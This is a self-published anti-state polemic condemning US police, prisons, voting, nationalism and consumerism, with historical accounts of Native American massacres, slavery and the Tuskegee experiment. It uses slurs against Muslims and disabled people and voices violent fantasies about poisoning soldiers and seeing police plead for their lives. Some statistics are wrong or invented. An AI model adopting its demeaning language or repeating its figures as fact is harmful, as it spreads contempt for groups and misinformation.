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Copyright © 2022 by Brent Elisens

All rights reserved. This book or any portion thereof

may not be reproduced or used in any manner
whatsoever without the express written permission
of the publisher except for the use of brief
quotations with credit.

Printed in the United States of America

First Printing, 2021

ISBN: 9798807772008

yt/ig/tw/tiktok: @sixie6e

Book of Death

Blue Stripes, Bald Eagles, and Blind Loyalty

brent elisens


The United States has an actual history of

people being dehumanized, tortured,
slaughtered, and displaced for the creation of
the 1776 symbolism rampant today. These
things still continue today. This book is about
that history. It also is about the corporate
state's psychological warfare to keep its
citizens either accepting of that history...or
even...proud of it.

Reform is just another way for the established

authority to maintain that obscene authority
with consent. Authority always requires
consent. When it loses consent, then authority
requires force. Control their language, control
their reality. What is the authority authorizing?
Who, and for what means/ends? Resource
competition among the poor? Could you
imagine yourself being a part of the 'out'
group? Dehumanized like the ones you call
criminals and felons? There were 88,899
federal rules and regulations put in place
between 1995 and 2016. Someone has to
enforce that garbage. The united states prison
'industry' generates more revenue than the
combined GDP of 133 countries. Arrests are
incentivized because prison contracts require
90-100% bed occupancy. That means that at
all times, those beds have to be full. Where are
they going to get the bodies? From your votes,
you "I worship master" defectives.

If you vote, you don't care about others.

Begging master to force his will on others with
other members of the populous that sport
badges representing authority(more on
symbolism later).

If you vote, you don't care about others.

You care about you.


Hunger, thirst, and shelter from the

elements. We all need sustenance to exist.
Where is your food going to come from? Not
from you, that's for sure. You are born into an
established dystopian equilibrium where the
wealthy control the resources. You have to get
in with their corporate gang if you want to wet
your beak. Slaving for a logo/gang is not an
existence. The gangs often refuse people. Do
you sincerely think that an entire society
existing this way with police enforcers could
ever be 'crime' free, let alone healthy? If you
do, that's called delusion, doctrine, and if you
introspect - you can see there is some form of
irrational symbolism you are bound to. You're
not going to like the way you look. I guarantee
it. That's why most hold to their garbage
symbolism. It is intellectually defective but
emotionally easier to stonewall themselves.
I've done it, we all have and do. There are
things I don't currently want to face. I can
justify my prescriptions of corporate chemicals,
but at some point I still have to accept
responsibility for my own existence like I
constantly am telling baseheads to do. Street
or corporate we are all junkies, even corporate
executives. There are corporate products(yes,
we are corporate products but we are also
bound to them) you have been conditioned to
believe you cannot exist without. You will
spend most of your waking existence as a
number runner for a corporate gang to get
those corporate products. Most corporate

products are unnecessary. Most products are
destructive to the planet. Manufacturing &
mining also destroy the individual. The greater
good is often used by tyrants to rally the
mentally susceptible against someone who
usually isn't the problem. If your individual is
unhealthy, your society is unhealthy. That is
the flaw in placing society(an abstract concept)
over the individual. The individual is society. If
you abandon them, what does that say about
you and your society of greater good? While
you are gossiping about what some rich, pasty,
apathetic asshole said about another one,
people are suffering severely in your
community. The united states has a much more
prosperous and prestigious record of murder,
rape, robbery, numbers, kidnapping, extortion,
trafficking, witness tampering, and terrorism
than the proposed criminals and terrorists do.
Imagine being a police officer. You get to
enforce a depraved system, then some of the
victims of it call you a 'hero' for your violence.
Then the politicians(judges and district
attorneys) protect you from having to answer
for any of it. There is always an excuse, always
a reason. Any intelligent, corporate boss is
going to try to protect the footsoldiers that do
his dirt. The judges and district attorneys are
not going to go arrest anyone themselves.
Without the police, they would have no
employment either. A gang fulfilling their own
self-interests at the expense of anyone that
isn't them. A corporate mafia hiding behind
bald eagles, blue stripes, and blind loyalty.

A mafia boss is going to protect his
empire before he protects his soldier, unless
his soldier is necessary for the empire to
continue successfully. The vast number of
available soldiers(employees) makes them
expendable. A farmer is going to give a
minimum shit about his livestock. Care has
been marketed like every other tangible thing
and abstract concept. So care cuts into profit.
Care is an expense. They give a minimum shit.
A grocer doesn't want spoiled produce. Spoiled
produce is bad socially and financially for its
profit process. Spoiled produce gets sent to a
different process, perpetuating the system.
"This tomato has a spot on it, throw it out. We
cannot have some victim of the system we give
handouts to, sue us for a spot on a tomato." It
goes to the lower class citizens through a
different, insulated process. This is the system
enforced by the blue stripe bandits. 40% of

edible food is thrown away and there are more
empty homes than homeless. It gets even

$43 Billion spent on movies.

$250 Billion spent on fashion.

$11.8 Billion spent on bottled water.

$200 Billion spent on fast food.

$99 Billion generated from sex trafficking.

$82.5 Billion given to churches.

18,000 golf courses in the united states which

is 2 Million acres that could be used for

All of this while people complain about

trivial problems based on preference. Human
convenience is destruction. People should not
complain about things until they take personal
responsibility for their contribution to any of
these things.

$4.3 Trillion spent on healthcare ~18% of the

american GDP. A large chunk of that [~$378
Billion] is spent on prescription drugs.

The pharmaceutical, medical, and

psychiatric industries are best of friends
exploiting the corporate laboratory of an
existence that is your 'life' for everything they

possibly can. Within twisted wording of the
lawbooks they authored or bought, of course.
You cannot beat the system unless you are on
top and you cannot get on top by going against
it. It is a catch-22. We are all tethered to the
system by the Constitution, which is of course
drafted around consolidation of power/wealth.
You cannot escape it. Many worship it. Many
who don't respect it, praise it when it works in
their favor. A subjectively 'good' police officer
justifies police tyranny across the board. A few
dollars made justifies the entire Ponzi scheme
in the eyes of that same scratch-off ticket
participant of the state numbers racket. Hope
exploited. A slow, unjust, degradation of spirit.
So the industrial, war machine can steamroll. If
you comply, you perpetuate the system. If
you resist, you're 'crazy'. That is a perfect
setup master has for social control and
division. Everyone fears everyone and calls
those who don't fear others insane. If the
system representatives, enforcers, and
exploitees live in fear, then why not do away
with the current construct entirely? There can
be no genuine justice in a system that exploits
basic needs. Especially one like ours that is
mandatory, just because we were born here.
Another boundary on the globe's injustices do
not validate the injustices of your own by
comparison. The 'lesser of two evils' line is a
common fallacy used to justify this bullshit. I'm
on repeat sometimes but I'll rerun again - we
made WiFi from things found outside but we
can't make sure everyone eats, doesn't thirst,
has medical care, and protection from the

elements. That is not intelligent or evolved.
That is degenerate and exploitative. At least
you have your sports teams, celebrities, and
your instant, packaged tastes. Look at you go!
Look at your hat. Shirt. Shoes. Logos. I find it
strange that logos is an appeal to logic, reason,
and/or proof. None of which a corporation
exhibits. They can't do that or they won't stay
in profit long. Irrational thought is the name of
the game. Rational people do not spend their
gruelingly earned federal debt credits on
flashy, unnecessary shit. Irrational people love
doing that shit. It consumes them though they
believe they are doing the consuming or they
don't even realize it.


When I say crime, I mean actual crime.

Actions by one entity that cause genuine
suffering to another. I do not mean the current,
arbitrary wording by rich politicians that keep
the lower classes divided. I mean things that
hurt. Home invasions, actual rapes, homicides,
kidnappings. Two consenting adults in a fist
fight? No. An adult in his home doing lines of
cocaine with no non-users, children, or
involuntary people present? No. The people
forcing the poor to manufacture that cocaine in
toxic environments? Yes. A person not paying
the state before driving their own vehicle? No.
A person hurts an animal that isn't attacking
them? Yes. Under this nationalist, american
regime people often get more prison time for a
gram of meth than you do for supergluing a
dog's eyelids shut or forcing your dick into a
child's body. Actual crime. Things that hurt.
This is going to be automatically rejected at
first but just read me out - crime stops with
compassion, forgiveness, and understanding.

Compassion - If someone steals $20

from you, are you really going to call the
police? Why? So you can have their family pay
the state, Securus, and Tiger/Aramark crazy
money? That's really fair isn't it? Stealing isn't
okay but also, it wouldn't be a thing if we
weren't forced to compete for resources would
it? Do you call the police so you can label
someone a thief with a badge, seal, and
paperwork backing it? I don't think a person

should be stolen from. I also don't think the
police should be pocket checking peasants for

Forgiveness - Justice is a lucrative

misnomer for state sanctioned vengeance.
Every time someone seeks revenge, the state
calls it justice and the Treasury calls it
business. If you forgive them that $20 theft and
priceless violation of resource competition
rules, you'll find that not only do you not rage
at them, but you might feel better having
helped someone who needed it. If someone is
struggling internally(within reason) and you
beat them up for how they behave because of
that internal warfare, that is not going to help
the person grow and develop. Is that not that
ultimate goal for individuals and the abstract

concept we call society? Or is it to get as much
material shit as you can, stiff arm anyone else,
tackle them, call foul, and anything else to 'win'
the 'never-ending game'? Is it cry about your
McDonald's order with the same intensity as if
the cashier broke into your house? Is it trade
unnecessary shit with people and mass
consume until you die?

Understanding - In order to have

compassion and forgive, it helps to understand.
The state profits heavily in revenue and social
order every single time someone calls the
boots for something trivial and small. Handle
your own disputes. The amount of money you
spend on garbage, is it not worth $200 to find
out someone is struggling and you can help
them? I could argue that is cheap to know to
not let someone back into your home, and
refusing them entrance is justified. However,
that is not how I think or feel. If someone stole
from me, I am going to figure out why. That is
most important. That means that I have
somehow made them afraid of asking for
something that is severe enough to risk the
social relationship. They could also be
ridiculously prideful and it isn't my fault, but I
am so outspoken on society being constructed
around unnecessary shit, that if they are in
debt for unnecessary shit, that might make
them not ask me and instead feel their only
option is to steal from me. This is assuming I
have $200 on hand which is never the case.

This triumvirate of dismantling

corporate/state control is realistic, if enough
people were to adopt it and reject begging a
politician to have their enforcers send the
person you don't like through the system.
Getting them to abandon their gang symbolism
to care for strangers they have been taught to
fear, though? Difficult. Not impossible,
therefore realistic. It might take even more
death carried out by their masters behind their


Before 1492 there were 60.5 million

Native Americans prior to European contact.
Between 1492 and 1600(108 years for the
slow) 90% of the population was eradicated.
People are proud of it though. They even
celebrate it with a special day. I don't
understand how humans have survived the
planet this long without self-destruction. It's
one thing to commit suicide, it's another to
force someone else to. The dehumanization I
see today, I can only imagine the level of
barbarity back then because it was openly
acceptable to hate those different than you.
Fear has always been the leash used by rulers.
Hate someone and you will allow anything to
happen to them. Rulers usually have
unrestrained power. Divine right of kings.
Humans as gods. Say that to yourself slowly,
several times. Humans as gods. Someone that
profits from your exploitation tells you they
love you, you believe them, then you worship
them for exploiting you. Someone that lives in
a mansion while you struggle to not have your
sardine can stolen by a bank or kicked out of it
by your slumlord. There are zero rational
people that worship other humans or imaginary
friends. Look at how people deify their favorite
politicians, athletes, and entertainers.
Feudalism violently eases into capitalism with
the rise of nation-states. Corporations.
Feudalism is garbage but that does not make
capitalism or socialism or communism

acceptable. You cannot have a successful
system where the lower classes are used as
cheap labor. It never works out. Ever. Except
for the oligarchs and plutocrats in the
meantime. During this time, the people that
people like you labeled a criminal, were
transported to america from england as slaves.
To do the hard work, the daily work, the
garbage and sanitation, cook and clean. To
fight wars. To die for the luxury and
convenience of master. Also during this time,
lower class people arrived by boat and were
concentrated in certain areas, the major cities.
Philly and New York City. Forced to compete
for resources. If you throw a group of people
into a small space and then make them
compete for resources - that is a tried and true
formula for violence, fear, depravity, rage,
gangs, etc. Which is...drumroll...exactly what
happened. In 1767, citizens formed the first
american vigilante group, which attacked and
punished gang members. They were
unsuccessful as a gang smashing out gangs.
This is a great concept except for what
happens when this vigilante group becomes
the dominant gang? More authority, more
symbolism, and more socially dominating
behavior most likely. "Our way or the
highway!" and "You're with us and comply or
you're a traitor!" is how it usually goes. I never
group up. Ever. Even if I know I am going to
die. Cowards depend on others to protect
them. If I lose against more than 1 person I still
won. I had courage where they did not. You'll
find that most predators go for easy prey. They

don't want a challenge, they want an easy
score. If everyone stood strong even when
alone, predators would be much, much more
apprehensive about targeting those walking
alone. Not everyone is a fighter but if grandma
carries a .32, grandma becomes ~32% less of a
target with a chance of actually preventing the
crime instead of asking the state to come profit
from it afterwards. I don't like guns. Mala fide I
know(lesser of two evils in this case) yet given
the choice I would much rather grandma have
a handgun than the corporate, militant,
nationalist, jackboot, revenue generating,
policy enforcers. Grandma is not stealing from
people for the state with a badge, then a gun if
her badge fails. Grandma is not jumping people
in the street. Problem with that bogus choice
given, is that grandma enforces the system by
begging master(voting). Every time grandma
begs master, she helps enforce the system that
creates the predators she is asking master to
protect her from, with those corporate
enforcers. Would gangs even exist if basic
needs were accounted for and fear was not the
powerhouse of control it is among resource
competing slaves? Gangs have to have
enemies or they're just a treehouse club.
Backyardigan derivatives. Each gang thinks
they have the correct way. Correct way for
what, though? How to exist in master's
corporate construct that exploits every aspect
of their existence? Me, my, mine. The socially
accepted maxim is my family over yours. Us
versus them. Social division. Master's will be

Existentially, you can't own land, but we
stole this area from them with behavior that is
still rampant today. Native Americans were
slaughtered. Tortured. Dehumanized.
Displaced. Enslaved. Executed. Most Americans
are infuriatingly apathetic:

Frankenweenie is not the minority. The

majority of society is like him and will justify
their garbage any way they possibly can, so
that they may continue wallowing in their filth
with the least amount of disrupt possible.
Frankenbeans is repeating programming from
300 years ago in this case, but thousands of
years ago in other cases. His mental hard drive
is defective. He'll swear yours is though. How
can you reason with someone like
Frankincheeks? You can't because he, and the
conditioned degenerates like him, take
everything you say and either co-opt it or keep
turning it around like a Muslim working his way
through his dinner plate. Have you ever heard
one of your masters apologize for a genocide?
It Disrespectful for certain. You
can't apologize for a massacre. Even when he
tried, master only apologized because the
slaves were currently making a big deal about
it. Master apologized so they went back to
work. Until the next injustice. Master monitors
the current, ever fluctuating zeitgeist, and
adapts to it. Responds to it. Alters their media
presentation. This is the information age.
Ignorance is a choice. You either try to learn
history and keep it from happening, or you try
to justify your current luxuries and
conveniences. If you had no luxuries or
conveniences, would you be so loving of your
nation-state-god that so graciously bestows
them upon you once you have met the required
amount of physical labor? I submit that you
would not. I submit that were you to abandon
your dependency on most unnecessary things,
you too would be resisting master. You cannot

'build' a nation in an already inhabited area,
knowing humans are territorial and compete
for resources, without violence and injustice.
That is not suggesting the violence is not
injustice. If you give packs of men permission
to go conquer, what do depraved men do that
are bound by their primitive instincts and
taught that those of a different skin color are
property, enemy, and to be dehumanized?
Rape and enslave. If your company were
raiding a Native American village and you tried
to protect the villagers from your own
men...what do you think would happen to you?
Same thing that happened to these decent

Gang members that remove their

patches get X'd out. Police only like snitches to
tell on other people. When you spotlight their
moral crimes, you become a traitor to the gang
whether you are a member of it or not. If your
companymen were more violent than you, and
you tried to stop them from raping Native
American village women and children - you
would have been X'd out. Groups do not like
challengers especially from within their own
ranks. Resist the dominant gang and you
usually die. The punishment for apostasy is
usually death. "How dare you turn your back on
us, after all the things we manipulated you
with(did for you)!" I like to think that someone
under Chivington's command(following orders
is not absolution of guilt), protected as many as
he could and hopefully put down some of his
'own' 'men'. I doubt it.


If you celebrate '1776' or 'Independence

Day' or 'Patriots Day' then you are who I spoke
of in the introduction. Holidays to help you
bond with master and his mobilized national
community. If I call someone a traitor it is
never in reference to this imaginary boundary
on the planet. It is in reference to their
humanity, to people, to life, to themselves. You
cannot claim you want what is best for others
and then hide behind a flag, song, and hand
salute. You can try but just know, we see you
for what you are: Someone that wants the
world their master's way and if people don't
want it that way also, they are traitors that
should be put to death. This is what spawned
from the 1776 Declaration of "We own our own
corporation with our own slaves now, so fuck
off, Queen!" Independence. 3,500 black people
were kidnapped from Africa or the Caribbean
and sent to america each year. To work, or go
die in wars. America was built on genocide and
forced labor. Even after this boundary was
conquered and proclaimed to be 'free', it still
took almost 100 years for people to say, "Wait,
unless people steal(refer to § 1) forced labor is
wrong..." Even this 13th Amendment provides
the wealthy a loophole to use other humans as
forced, cheap labor. Label them criminals.
Villain comes from a synonym of villager.
Villein. Common peasant. Control their
language, control their reality. If the suits &
boots can label someone a criminal, the other

villeins will permit the dehumanization of their
fellow castemates. Casketmates. Socially
trapped basketcases. Defending masters
mandates. Defending masters property.
Defending master's wealth. Have you ever
seen a fast food cashier try to stop the thief
that has a gun, from taking massa's money?
They're stupid. Not valiant. Not courageous.
Stupid. And a traitor to their fellow laborers. If
the thief was going to shoot a fellow laborer, or
even an uncle tom(manager, assissant
manager), then it becomes valiant. If they tried
to stop them from stealing money from
master...mental defectiveness. If I see this type
of situation, I am not going to stop the person
unless they are going to hurt someone. Even
uncle toms are victims of massa's conditioning.
Try not to hate them. I struggle with this
severely. Slaves that weren't
physically/mentally strong enough to fight
would passively resist by breaking tools,
equipment, etc. Just because you can't fight
the enforcers doesn't mean you can't fight.
Filing court/criminal motions against other
poor/middle class people does nothing but give
master more power. You may or may not get
some federal debt credits in a master decided
'victory'. Look at you go! All of the things that
you do to avoid resolving problems and issues
on your own, gives master his power. By not
participating in the system you withdraw your
consent. A mass withdraw on an individual
level would call for immediate restructuring
that benefits all of life and puts basic needs
first. This resource competition system and its

garbage 'justice' many innocent people
have been slaughtered behind it? Let's start

Slaughters can be brutally violent and

slaughters can be brutally drawn out. The
massacres were instantly violent. The enslaved
however, had to die every day. Many people
think they can plot and plan their way to

overthrowing master, so they perpetuate
master's oppression in the meantime. Such as
our daily drudgery of pay and collect. Generate
wealth for the wealthy and barely enough basic
needs for ourselves. A slow, meaningless
existence of work to buy unnecessary shit and
recover on the weekend to go do the same
again. And again. Then again after that:

The Industrial Revolution was the birth of

some almost unbelievable and some severely
depraved things. Humans created some
wondrous material things. They also placed
these things over the well-being of their fellow
humans. Slaves were in high demand. Who is
going to do the grueling work? Steve Jobs didn't
build the iPhone. He had a task force. They
received no credit. Master plutocrat accepted
the awards. Basking in the adoration of the
mass of corporate slaves. Who is going to mine
the materials, assemble machines, etc?
Oligarchs and plutocrats do not like getting
their hands dirty, literally or figuratively. Does
master fix master's plumbing or does master
compensate 'the help' to do it? If you throw a
group of people into a small space and then
make them compete for resources - that is a
tried and true formula for violence, fear,
depravity, rage, gangs, etc. Gangs like the
Bloody Tubs haven't gone anywhere, they just
have different names. They hate foreigners and
they rally behind masters that also hate
foreigners. Anti-immigrant. Xenophobic.
Degenerate. Intellectually defective.
Kidnergartners stuck on colors. All accurate,
choose your favorite synonym for the simple. In
the mid 1800's, these crowded environments of
resource competition created severe riots in
the major cities. These riots kicked
development of police forces into SWAT mode.
Enforce the system of resource competition,
then try to play the victim. Police haven't
changed a goddamn bit. Patrick #Lyoya was
just killed execution style by american police
on April 4, 2022. Unarmed. His crime was not

paying the state to drive his own vehicle and
then resisting being kidnapped for ransom
behind it(bail). They also killed Enzo the dog
and Tyre Nichols.

Though it started well before then, in

1830 was the Indian Removal Act. The Trail of
Tears. Steal their land, then send them out
west. Around 4,000 died en route. The army
deliberately routed them through areas with
known epidemics. half the Cherokee population
was decimated.

Between 1849 and 1870 more than

4,500 Native Americans were killed and
10,000+ kidnapped and sold into slavery
during the acquisition of California. We
'acquired' it in a treaty with the Mexican

government. Then we impose shit like this: a
California law made it legal to declare any
jobless Native American a vagrant, then
auction his services off for up to four months.
You could kidnap people of a different color and
they couldn't testify against white people.

In 1864 was the Sand Creek Massacre.

An atrocity led by united states army Colonel
Chivington. It is hard to type this without
crying. 675 soldiers massacred up to 600
people. The monster claimed they were
warriors as if that would justify it somehow.
They weren't. They were mostly women and
children, which his men massacred and took
body parts as trophies(scalps, genitalia,
fetuses, etc). Chivington stated, "Damn any
man who sympathizes with Indians! ... I have
come to kill Indians, and believe it is right and
honorable to use any means under god's
heaven to kill Indians. ... Kill and scalp all, big
and little; nits make lice." If I were alive during
this time, I would have found a way to access
company meals and then poisoned them all.


Idolizing celebrities is a way for master

to condition slaves. "Be like them. Dress like
them, try to act like them, and maybe one day,
you too can help influence the lower classes!" If
you watch movies from this era, you can see
how everything from appearance to material to
fear is recycled. The social conditioning works.
The corporate construct efficiently plants roots
during this time.

The symbolism changed but the

behavior hasn't. Fascism is a set of ideologies
and practices that seeks to place the nation,
defined in exclusive biological, cultural, and/or
historical terms, above all other sources of
loyalty, and to create a mobilized national
community. The American flag represents the
fascist gang. The Blue Stripe Bandits flag
represents the fascist enforcer gang. I am not
an Antifa member or simpleton that thinks
everything is fascist. Most Americans deny
fascism and most people have a hard time
interpreting dangerous symbolism for what it
is, so I keep explaining it in my writing and on
social media. World War 1 and 2 leftovers. The
broad umbrella of us versus them. The donkey
flag, the elephant flag, the blue stripe bandit
flag, the green gartered grunt flag, the red
rescue & revive flag, the confederate flag, the
cross of the bible, and street gang flags are all
garbage symbolism. Each group thinks their
group should be in power, on top, a mobilized

national community, and an exception the
rules. Each thinks they have 'the right idea' for
how to exist. All are not only inherently wrong
but cause mass suffering while claiming to do
the opposite. Tribal warfare is not a sustainable
society except for the masters and unless the
penned cattle have ranch hand referees.
Fascists and communists hate each other but
they're stupid because both have the same
thought process. Most communists are also
fascists. Do you think that Stalin's regime had
no fascist operations? When you militantly rally
people behind a country and its symbolism...I
don't know how else I can show you. You think
crips controlling one block and bloods
controlling another is an absurd way to live,
correct? If you engage in American symbolism,
you do the same thing. "This is our geographic
region and if you offend, we will group up
behind our flag!!!" Flagtards that don't know
history except for a colonial misretelling.

Slaves in ancient times had better

quality of life than that of villeins in the same
time period. Sure you can go fend for yourself
with the rest of the commoners, or you could
slave for master. Depending on how they
valued their own existence, many would have
'voluntarily' opted for it. People today still apply
to be live in butlers and not just for
disabled/elderly people. For entitled, wealthy,
degenerate people that convince themselves
they are doing the slave a favor. Putting a sea
turtle in a tank. Yeah it might be 'safer' for it
(except from those also in the tank), but only

because it is willing to engage in existential
subservience to a turtle already in the tank,
and the master that hands out rations.

Slaves(lower class citizens) that weren't

physically/mentally strong enough to fight
would passively resist by breaking tools,
equipment, etc. Music and writings such as this
were were weapons of resistance. They would
fuck up paperwork for equipment and
manufacturing shipments. They would fake
illness. They would do any and everything they
could to slow the system down. Our current
form of corporate debt slavery really starts to
take root. Go into debt for comfort and
convenience. Then go into debt for basic
needs. "Get your Westinghouse washer for only
3 payments. It does x, y, and z leaving you
more time for shopping for other debts to
incur!" An entire society of middle and lower
class people borrowing what they don't have to
buy what they don't need. As they look down
on the poor while forcing polite speech with
basic needs. Be respectful to your oppressors
or get the nightstick. If someone is hungry and
I have food, they can call me a cunt and say
almost anything to me disrespectful (if they say
something like "I'll sexually assault your
daughter" obviously an exception but no one is
going to say that in that situation), and I'll still
let them have the food. Most people though?
Someone gets disrespectful so they tell that
person they can go starve. That's fucked up,
the norm, and shows they have no mental

Let's point out the Tuskegee Syphilis
Experiment(calling it a study is trying to cover
it up with language sanitization). Just cover up
the people you destroy by calling those
'samples' Bad Blood and then its onto the next.
Labrats in a pen thinking master cared for
them. Human beings are still corporate state
experiments. Our lives corporate laboratories.
The Public Health Service started it in 1932.
They took 600 destitute black people, 399 of
which had Syphilis. They were promised free
medical care as incentive. A 6 month
experiment turned into a 40 year atrocity.
When funding ceased, they continued it
without telling them they wouldn't be
treated. None of them were treated with
penicillin, though by 1947 it was the widely
available standard treatment.

In "Resisting the Corporate American

Police State" I go in depth into basic needs
being held hostage. What could they do? Force
them to treat them and then go to prison and
get life worse? If you resist being exploited you
are called a suspect and a perpetrator by those
that defend and worship master. Masters that
are willing to do almost anything to fulfill their
agenda. To think that those in power would not
do whatever to whoever to maintain it, is to not
think. If master has an enemy, he'll get your
support one way or another. Master goes as far
as his slaves let him.


Violent crime decreases yet hate crimes

increase. Post Red Scare, cold war leftovers
era. Corporate american walls constructed by
the Reinhard Gehlen playbook, Mussolini's
OVRA tactics, and Stalin's NKVD tactics.
Advertising and entertainment are still used as
tools for conditioning. Celebrities being idolized
and mimicked. Fellow humans dehumanized
based on race, master worshipped, or religion
chosen. The corporate state has taken root and
the number of corporate slaves nearly doubled.
Religious texts demanding the slaves
propagate. Families in a resource competition
society are having more than 10 children.
Which is absolutely deplorable. Create more
children to go slave for master. More beings to
suffer at the hands of the corporate state and
take a shit that ends up in a river. Bill Burr said,
"That's not a family photo, that's an
environmental disaster and you framed it!"
During this time of degenerate humans making
unlimited copies of themselves. Did you think
new technology would mean this garbage
works out great in the end? Humans with 1st
century intellect have access to 21st century
tech. If the remedial people group up with
technology (like police do), you can expect
eradication of the rest of us. All these fucking
flags on every street. If you are anti-fascist you
won't last very long. I am anti-most things
society accepts. I am surprised I have survived
this long without either police or other

degenerate street thugs ending my physical

Slavery is still prevalent today. In the
United States and everywhere the fuck else. 25
million in forced labor, 15.4 million in forced
marriages, 4.8 billion in sexual exploitation and
more than 10 million child slaves. I'm resisting
this system and you absolutely should do the
same. Non-resistance is complicity.
Alternatively, you could rally your donkey or
elephant gang and keep begging master. That
has not worked in a century. Rodney King
getting his ass beaten (the Schutze will say,
"taken down with compliance techniques") was
in 1991 yet the police are still out here
working the lower classes over for master.
Generating that revenue. Inmates go combat
forest fires and construct uniforms and
mattresses for the military industry and the
prison industry. Back to that 13th Amendment.
It has a provision for slavery. Label the lower
class criminals and you can work the villeins to
death. 24 hour shifts, ~$2.90 per day. Just
because you give someone a couple bucks
does not make it 'not slavery'. The majority of
inmates don't want to sit in a fucking concrete
and steel box. "Yeah, the fire is hot and it's
dangerous, but at least we get to go outside
and we get some commissary money!! 24
hours is a pad of paper, 2 pencils and 2
stamped envelopes to communicate with my
family!" Shackled labor is a third of California's
firefighter force. Inmates have battled fires
since World War 2.

Mussolini's Italy was in the 1920's and 30's but
guess who is helping rewind Italy back to its
"We beat his body with hammers but then
forgot history apparently" state, besides the
gang-gang Olympics? His granddaughter. All it
takes is a generation for atrocities to be
forgotten. The metric for how long after one
atrocity occurs, it can be repeated and widely
accepted/desired. It isn't repeated the same. It
is a malleable derivative of it. I'll explain it like
this: There are many frameworks for
websites(Flask, Laravel, ASP.NET, etc). Let's
say for this example only that Flask is
Capitalism and Laravel is Socialism. A Flask site
from 2016 is not going to be the same as one
from 2022 yet the framework is the same, plus
patches and updates to secure it. Different
sites using the same framework won't look
exactly the same on the face. A Laravel site
from 2016 is not going to be the same as one
from 2022 yet the framework's the same, plus
patches and updates. The site won't look the
same. Different sites won't look the same.
Yet...the framework remains. Image and name
are a problem. "America can't be fascist like
Gestapo Germany because we don't send
people to the gas chamber en masse." A
dehumanized group to the gas chamber is part
of that specific 'site'. The framework behind it
is the same, except more secure. Why
exterminate people when you can put them to
work? There is always an enemy, a group to be
dehumanized and a flag to rally the other
members of the lower classes behind to do so.
An immediate tell for intellectual retardation is

someone proudly rallying behind flags.
Especially one master hands to them. You've
seen them. The flags in the American region of
the planet usually contain stars & stripes, bald
eagles, and crosses. 2001 is the year divide for
this section this reason. The great "fear of
middle eastern humans". Operation
Northwoods suggests that many United States
officials have no issue staging a terrorist attack
and blaming someone they are trying to rally
the citizens against. Us versus Them. All over
again. A group to dehumanize. A group to hate.
A group to let master save you from. "Fear
them, love and trust me!", sayeth the Tyrant.

That pretty much translates the

subtleties delivered in media rhetoric post twin
towers collapse. Islam is absolute garbage but
to target Muslims for the way master
conditioned them...displaced anger. Every

foreigner is now an invader in the eyes of
voters. Doesn't matter whether they think it,
they voted for that rhetoric even if they voted
against it. Votes don't determine outcomes.
The oligarchs and plutocrats count how many
people still vote. In other words, how many
people still delegate their power to them. How
many people still beg master. How many
people swallow the corporate state phallus.
How many willing system paticipants remain.
Your vote says you do those things because
those things and voting are interchangeable
descriptions of the same behavior. The state
and corporations(the state is also a
corporation) require consent of the masses.
Individuals giving their consent are those
masses. Individuals refusing to give their
consent become mass withdrawal of that
consent. The people screaming #MeToo and
about consent are begging master if it's okay
for them to not consent. Which is not the
definition of consent. That is the definition of

"Please master, may I?"

To which master responds, "If you go lock down

and let me continue to have control, I'll
consider it!"

The slaves go lock down. They go home. They

wait patiently for master's decision, meanwhile
continuing to work for and submit to master.
Time is one of the system's greatest weapons
against us. Relentless. Merciless. Master can

apparently give us time and take it away.
Master has always exploited hope.

The United States is a corporation. It

behaves and acts the same as other
corporations. The bottom line is revenue. Profit.
Without having to do the manual labor for it of
course. That is for the undesirables, those to be
dehumanized, etc. Name a single corporation
that does not try to minimize overhead.
Overhead for the united states corporation
consists of healthcare, food, water, you
know...basic fucking needs. The bare minimum
required to keep the livestock functional.
Utilitarian apathy from another authoritarian

I can't go a mile without seeing an
American flag. You would think the entire
society has Alzheimer's and they keep
forgetting where they are. Well, they do. They
think they live on Planet America because of
Plato's cave allegory. Real easy to think that
your snacks and electronics are reality, isn't it?
Snacks and electronics are control methods.
Many people will accept prison as long as they
get snacks and television. Distraction from the
time. Many people choose prison because basic
needs are met. Enough to keep the livestock

'live. Prisoners generate revenue. Their families
get exploited by phone and commissary
companies for communication and snacks.
Even by sitting in a cell, not working, not
'contributing' to society like these degenerate
rednecks claim a real man should - they
generate astronomical revenue.

Rednecks are the last line of defense

against anything that challenges master's

construct. They love their flags, guns, and
trucks, and they love master. Master hides
behind the flag. They would never go against
their precious sky cloth, therefore would never
go against master. Anyone who challenges
master is a traitor. Anyone who challenges
fascism or capitalism becomes Antifa or
communist or socialist. Master is the only one
that can fuck them with no grease. Listen how
proud of it they are. So loud about how much
they love it. Then they demand you bend over
and love it, too. I have a better proposition,
how about you and your master go find a

5 people out of 1000 begging for

authoritarian abuse/tyranny/intervention does
not justify the authoritarian abuse/tyranny
perpetrated onto the other 995 people that just
want to be left alone. Your fear does not trump
the freedom and well-being of others.

You would be causing an immeasurably
less amount of societal suffering by eating the
whole front end of a greyhound. Not the dog.
Your choices that your body acts out cause
other people problems. I don't mean trying to
beat the traffic light. I mean choices like
worshiping master. Choices like demanding
people submit to covidfear yet drivers kill
3700+ people per day. Choices like begging
politicians to use their police to make criminals
out of everyone. Someone making it so you
have to wait another rotation at the traffic light

is not a problem. Where do you have to be so
bad that you would wish harm on this person
for delaying it by 2 minutes? If picking up your
kid up from school is your excuse, why are you
having strangers raise your children? Is it
because you have to go work for master? Your
submission is cowardice. Your submission and
his submission and her submission is all of our
enslavement. Now maybe you can see why I
am offended by your existence. Your fake
altruism, feigned empathy, and your fraudulent
compassion. Self-interest. Self gain. Self
preservation. Look how many people can't do a
kindness without posting it on social media or
bragging to people they know. If you did it to
help the person instead of trying to look good,
you wouldn't need to say anything about it
except when a situation calls for explaining
how someone else needs to do the same. Can
you do it without making yourself look positive
or negative? Try telling them that you saw
someone else doing the kindness. That is a
good way to teach the lesson while leaving ego
and image out of it. Speaking of image and
ego, after I handed a 6'7" combat vet's ass to
him for hopping out in traffic trying to fight, he
called the police. While the police were asking
me about it, they asked if I were a police officer
and someone wouldn't get their car up to
inspection after warnings, why wouldn't I write
a ticket? How else would you get them to
comply? My response was this: "If I worked for
the state like you, I know that my finances
would be secure so I would buy the person the
car part. Stealing money for the state from

them, doesn't put them any closer to getting
their car approved. You just want compliance.
You don't give a fuck how it affects society."
Fucking schutze. With their gelled hair, tribal
tattoos, and Blue Stripe Bandits covid masks. I
can't wait for Nuremberg Round 2, though I
doubt I'll be alive that long. It would be
existentially satisfying to see the depraved with
the fear in their eyes for once, trying to plead
for their lives to the people they brutalized and
exploited for master. "I was just doing my job!"
That shit is so tired. The excuse doesn't work
but they keep trying to use it. You can beg
